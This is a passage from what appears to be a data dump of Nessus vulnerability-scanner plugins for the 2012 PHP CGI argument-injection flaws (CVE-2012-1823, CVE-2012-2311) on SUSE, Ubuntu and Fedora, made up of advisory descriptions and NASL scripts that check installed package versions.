rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pear-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-phar-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 
reference:\"php5-phar-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-5.3.8-4.15.2\") ) 
flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-debuginfo-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-5.3.8-4.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-debuginfo-5.3.8-4.15.2\") ) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T07:15:15", "description": "It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2012-05-07T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1437-1.NASL", "href": "https://www.tenable.com/plugins/nessus/59016", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1437-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59016);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"USN\", value:\"1437-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 / 12.04 LTS : php5 vulnerability (USN-1437-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that PHP, when used as a stand alone CGI processor\nfor the Apache Web Server, did not properly parse and filter query\nstrings. This could allow a remote attacker to execute arbitrary code\nrunning with the privilege of the web server. 
Configurations using\nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is\nconfigured using mod_cgi and mod_actions as described in\n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate\nconfiguration is used to enable PHP CGI processing, it should be\nreviewed to ensure that command line arguments cannot be passed to the\nPHP interpreter. Please see CVE-2012-2311 for more details and\npotential mitigation approaches.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1437-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php5-cgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10 / 12.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.24\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.15\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.5-1ubuntu7.8\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"php5-cgi\", pkgver:\"5.3.6-13ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5-cgi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 16 : maniadrive-1.2-32.fc16.5 / php-5.3.13-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.5 (2012-7586)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7586.NASL", "href": "https://www.tenable.com/plugins/nessus/59266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7586.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59266);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n\n script_name(english:\"Fedora 16 : maniadrive-1.2-32.fc16.5 / php-5.3.13-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16.5 (2012-7586)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081285.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?804c30d0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae564cca\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081287.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?61b39ea9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"maniadrive-1.2-32.fc16.5\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-5.3.13-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-eaccelerator-0.9.6.1-9.fc16.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7628.NASL", "href": "https://www.tenable.com/plugins/nessus/59268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7628.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59268);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7628\");\n\n script_name(english:\"Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080952.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1eea669\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a831d09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected maniadrive and / or php packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"maniadrive-1.2-40.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"php-5.4.3-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:37:35", "description": "This update fixes several security issues in PHP5 :\n\n - 
A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode, because a query string could be passed to\n PHP-CGI as command-line options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.2 Security Update : PHP5 (SAT Patch Number 6251)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:php53-fileinfo", "p-cpe:/a:novell:suse_linux:11:php53-ftp", "p-cpe:/a:novell:suse_linux:11:php53-mysql", "p-cpe:/a:novell:suse_linux:11:php53-calendar", "p-cpe:/a:novell:suse_linux:11:php53-curl", "p-cpe:/a:novell:suse_linux:11:php53-zlib", "p-cpe:/a:novell:suse_linux:11:php53-soap", "p-cpe:/a:novell:suse_linux:11:php53-sysvshm", "p-cpe:/a:novell:suse_linux:11:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php53-bz2", "p-cpe:/a:novell:suse_linux:11:php53-wddx", 